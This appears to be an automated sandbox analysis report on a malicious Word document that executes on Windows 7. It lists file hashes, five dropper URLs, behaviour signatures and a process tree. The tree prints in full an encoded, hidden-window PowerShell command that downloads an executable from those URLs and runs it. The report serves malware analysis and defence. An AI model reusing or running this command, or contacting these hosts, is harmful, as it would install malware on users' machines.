Analysis

  • max time kernel
    55s
  • max time network
    60s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2024 21:30

General

  • Target

    82315a8feb90654d5bf2041a0985ceea5c88031e3b51b4e848fdcbf8270442b0.doc

  • Size

    213KB

  • MD5

    406f47c8c156a30ea84d17132744705f

  • SHA1

    f033b11daf7f60e3f2e0163559463300dc3bb256

  • SHA256

    82315a8feb90654d5bf2041a0985ceea5c88031e3b51b4e848fdcbf8270442b0

  • SHA512

    a90f036d09e971f95e8a83a8d115d0d81241b4731a11cc9745bb42a6d0ffc8a4a6777a87684b7db481904eaaf102fbe067f76b84db611fc879a456bcbadb6739

  • SSDEEP

    6144:e/2k4ytGiL3HJk9cD7bZhS/D6LWPqMuD:e/rQitkS7bZJ5MuD

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://peikeshargh.com/wp-admin/HXU15i/

exe.dropper

http://cooklawyerllc.com/DB/XygG68105/

exe.dropper

https://www.meditationmusic.shop/musicshop/MYatxrUp/

exe.dropper

http://magic-in-china.com/wovltk23ld/f9aH1153/

exe.dropper

http://www.ikedi.info/wp-content/x4f7893/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\82315a8feb90654d5bf2041a0985ceea5c88031e3b51b4e848fdcbf8270442b0.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2164
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2792
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABZAHQAbgBwAHAAbwBjAHoAPQAnAEwAegBnAGwAbwBvAHoAdwBjACcAOwAkAFgAegB0AGMAdQBtAHoAdgBhACAAPQAgACcANwA3ADMAJwA7ACQASwB6AGQAawB4AGcAagBxAHMAPQAnAEEAZwBmAHEAYwBiAGgAZABmACcAOwAkAEUAegBlAHMAcQB3AGcAZgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWAB6AHQAYwB1AG0AegB2AGEAKwAnAC4AZQB4AGUAJwA7ACQATAB6AG4AcQBnAHgAegB5AHkAagBuAHEAagA9ACcARQByAHcAcQBiAG0AZwB1AGYAZgAnADsAJABSAGkAegBkAHMAcQBpAGsAdAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiACcAKwAnAGoAZQBjAHQAJwApACAATgBFAHQALgBXAGUAQgBjAGwASQBlAE4AVAA7ACQARQB1AGkAdAByAGoAaABxAG8AcwByAD0AJwBoAHQAdABwADoALwAvAHAAZQBpAGsAZQBzAGgAYQByAGcAaAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ASABYAFUAMQA1AGkALwAqAGgAdAB0AHAAOgAvAC8AYwBvAG8AawBsAGEAdwB5AGUAcgBsAGwAYwAuAGMAbwBtAC8ARABCAC8AWAB5AGcARwA2ADgAMQAwADUALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AZQBkAGkAdABhAHQAaQBvAG4AbQB1AHMAaQBjAC4AcwBoAG8AcAAvAG0AdQBzAGkAYwBzAGgAbwBwAC8ATQBZAGEAdAB4AHIAVQBwAC8AKgBoAHQAdABwADoALwAvAG0AYQBnAGkAYwAtAGkAbgAtAGMAaABpAG4AYQAuAGMAbwBtAC8AdwBvAHYAbAB0AGsAMgAzAGwAZAAvAGYAOQBhAEgAMQAxADUAMwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGkAawBlAGQAaQAuAGkAbgBmAG8ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AeAA0AGYANwA4ADkAMwAvACcALgAiAHMAcABsAGAASQB0ACIAKAAnACoAJwApADsAJABYAHYAdQBxAGgAcABsAG4AZAB4AGcAYQBsAD0AJwBHAHcAbQBxAHcAYgBwAHcAcQBoAG8AcQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQByAHMAbwB3AGQAZQB6AGIAdgBxAG8AZgAgAGkAbgAgACQARQB1AGkAdAByAGoAaABxAG8AcwByACkAewB0AHIAeQB7ACQAUgBpAHoAZABzAHEAaQBrAHQALgAiAEQAYABPAFcAYABOAEwAYABvAGEAZABmAGkAbABFACIAKAAkAEEAcgBzAG8AdwBkAGUAegBiAHYAcQBvAGYALAAgACQARQB6AGUAcwBxAHcAZwBmACkAOwAkAEYAaABsAHgAegBjAGQAZQBzAD0AJwBZAGIAaQBnAGsAdgBlAGsAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABFAHoAZQBzAHEAdwBnAGYAKQAuACIAbABgAEUAbgBHAHQASAAiACAALQBnAGUAIAAzADMAOAAzADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGAAQQByAHQAIgAoACQARQB6AGUAcwBxAHcAZwBmACkAOwAkAFQAbwBtAHcAaAB5AGUAagBzAHoAeQBpAHkAPQAnAEQAbQBvAHEAYgBkAGcAcAB5AHoAaABwACcAOwBiAHIAZQBhAGsAOwAkAEoAZwB1AGUAaQBvAHcAawBjAHUAPQAnAEoAbgBiAHoAcwBrAHEAcAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABWAGIAeQB0AG4AeQBuAHcAYQBpAHgAeAA9ACcARABlAHAAYgB5AHMAawB1AG0AYgB1AHMAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2556

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CBC304E.wmf

      Filesize

      444B

      MD5

      ed003c65473703abde6ff7e7172fd55b

      SHA1

      306e4b2bfe618dc156198551b57b71330d07a6ca

      SHA256

      f9ce679643762cd5e400d33b31295af010efe108395bc8323df64b74daa6eef1

      SHA512

      f56b77f029da2d61782f516e07f2aef69939be9ba6453d45b70c5b1efc5fbbf7ddaeba7d41d36eb93682339df53eea138ec5a6ae7d76d9931f706cbe7ca87d47

    • memory/2164-21-0x0000000005E40000-0x0000000005F40000-memory.dmp

      Filesize

      1024KB

    • memory/2164-2-0x000000007136D000-0x0000000071378000-memory.dmp

      Filesize

      44KB

    • memory/2164-5-0x0000000005B60000-0x0000000005C60000-memory.dmp

      Filesize

      1024KB

    • memory/2164-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2164-14-0x0000000005E40000-0x0000000005F40000-memory.dmp

      Filesize

      1024KB

    • memory/2164-0-0x000000002F411000-0x000000002F412000-memory.dmp

      Filesize

      4KB

    • memory/2164-22-0x0000000005E40000-0x0000000005F40000-memory.dmp

      Filesize

      1024KB

    • memory/2164-25-0x0000000005E40000-0x0000000005F40000-memory.dmp

      Filesize

      1024KB

    • memory/2164-35-0x000000007136D000-0x0000000071378000-memory.dmp

      Filesize

      44KB

    • memory/2164-36-0x0000000005E40000-0x0000000005F40000-memory.dmp

      Filesize

      1024KB

    • memory/2164-37-0x0000000005E40000-0x0000000005F40000-memory.dmp

      Filesize

      1024KB

    • memory/2556-31-0x000000001B640000-0x000000001B922000-memory.dmp

      Filesize

      2.9MB

    • memory/2556-32-0x0000000001F40000-0x0000000001F48000-memory.dmp

      Filesize

      32KB